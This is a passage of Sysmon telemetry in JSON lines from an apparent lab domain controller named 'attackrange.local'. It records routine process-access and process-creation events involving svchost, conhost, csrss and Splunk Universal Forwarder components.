C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:44.537","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6102,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:44.537\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-212C-5F25-0000-001067630900}\r\nTargetProcessId: 1344\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:44.537","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-212C-5F25-0000-001067630900}","TargetProcessId":"1344","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6103,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:44.677\r\nSourceProcessGUID: {41C8662E-212C-5F25-0000-001067630900}\r\nSourceProcessId: 1344\r\nSourceThreadId: 2124\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:44.677","SourceProcessGUID":"{41C8662E-212C-5F25-0000-001067630900}","SourceProcessId":"1344","SourceThreadId":"2124","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6104,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:45.772\r\nProcessGuid: {41C8662E-212D-5F25-0000-0010D0650900}\r\nProcessId: 2360\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:00:45.772","ProcessGuid":"{41C8662E-212D-5F25-0000-0010D0650900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:00:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6105,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:45.771\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-212D-5F25-0000-0010D0650900}\r\nTargetProcessId: 2360\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:45.771","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-212D-5F25-0000-0010D0650900}","TargetProcessId":"2360","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6106,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:45.771\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-212D-5F25-0000-0010D0650900}\r\nTargetProcessId: 2360\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:45.771","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-212D-5F25-0000-0010D0650900}","TargetProcessId":"2360","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:00:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6107,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:45.771\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:45.771","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6108,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:45.771\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:45.771","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6109,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:45.771\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:45.771","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
